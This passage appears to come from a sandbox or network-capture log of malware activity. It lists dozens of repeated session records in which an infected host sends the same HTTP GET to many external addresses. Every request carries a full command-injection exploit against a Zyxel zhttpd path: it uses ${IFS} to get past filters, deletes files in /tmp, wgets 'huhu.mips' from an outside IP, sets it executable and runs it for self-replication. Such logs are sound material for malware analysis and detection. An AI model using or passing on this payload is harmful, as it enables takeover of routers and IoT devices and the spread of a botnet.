                                      Jan 19, 2024 17:29:19.503405094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      851192.168.2.1452998159.54.62.55443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.503448009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      852192.168.2.1437100206.49.191.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.503500938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      853192.168.2.1460164186.86.107.237443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.503532887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      854192.168.2.1439900159.149.235.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.503575087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      855192.168.2.1437610198.80.72.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.503599882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      856192.168.2.1434944101.63.191.105443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.503674984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      857192.168.2.144821253.146.69.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.503710032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      858192.168.2.143503477.107.208.108443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.503729105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      859192.168.2.145842672.106.167.234443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.503778934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      860192.168.2.1446734183.156.218.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.503806114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      861192.168.2.1448576191.43.67.75443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.503845930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      862192.168.2.1437718108.218.199.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.503880978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      863192.168.2.145566287.88.182.71443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.503909111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      864192.168.2.144622273.182.46.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.503946066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      865192.168.2.1446248148.43.211.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.503983021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      866192.168.2.1455808154.36.187.208443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.504034996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      867192.168.2.1447224166.224.100.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.504082918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      868192.168.2.144591643.11.5.161443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.504125118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      869192.168.2.145961623.39.233.185443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.504183054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      870192.168.2.1437770209.232.5.217443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.504209042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      871192.168.2.143651898.100.162.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.504249096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      872192.168.2.144961814.108.72.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.504266024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      873192.168.2.1446026148.157.151.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.504319906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      874192.168.2.144497453.39.74.56443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.504354000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      875192.168.2.1453306189.114.201.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.504383087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      876192.168.2.1446794129.228.216.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.504432917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      877192.168.2.1454660157.71.229.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.504462957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      878192.168.2.1434768202.57.120.235443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.504525900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      879192.168.2.1442642196.249.11.108443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.504553080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      880192.168.2.1455408175.247.172.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.504590988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      881192.168.2.1449834142.175.18.28443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.504618883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      882192.168.2.145107063.200.182.59443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.504662991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      883192.168.2.1442796104.117.94.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.504698038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      884192.168.2.145046891.251.85.53443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.504730940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      885192.168.2.1444700130.64.159.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.504781008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      886192.168.2.144345492.127.244.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.504813910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      887192.168.2.144717848.83.1.127443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.504858017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      888192.168.2.1437254135.109.229.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.504892111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      889192.168.2.1433314185.222.169.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.504933119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      890192.168.2.1433412136.102.56.185443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.504967928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      891192.168.2.1460128221.85.0.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.505033016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      892192.168.2.1444330222.7.91.13443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.505055904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      893192.168.2.1459656144.111.181.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.505105972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      894192.168.2.1434308195.73.34.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.505145073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      895192.168.2.14380185.19.31.19443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.505187988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      896192.168.2.1456976125.100.80.185443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.505229950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      897192.168.2.1445584142.3.243.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.505248070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      898192.168.2.1443890112.251.146.209443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.505285025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      899192.168.2.1442078196.236.147.29443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.505333900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      900192.168.2.1442292216.26.21.107443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.505378962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      901192.168.2.143454666.94.177.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.505412102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      902192.168.2.1439840145.152.251.113443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.505460978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      903192.168.2.1440654102.119.87.201443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.505512953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      904192.168.2.143339498.21.123.102443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.505553007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      905192.168.2.145808275.157.235.53443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.505594015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      906192.168.2.14377744.224.28.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.505616903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      907192.168.2.143483292.135.7.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.505666971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      908192.168.2.1449682167.107.253.218443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.505696058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      909192.168.2.145293032.204.132.66443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.505717039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      910192.168.2.1450210108.248.246.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.505775928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      911192.168.2.1456350116.55.100.229443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.505816936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      912192.168.2.1439734208.53.141.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.505856991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      913192.168.2.1438494159.106.14.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:19.505892992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      914192.168.2.146092285.135.202.212443
                                      TimestampBytes transferredDirectionData
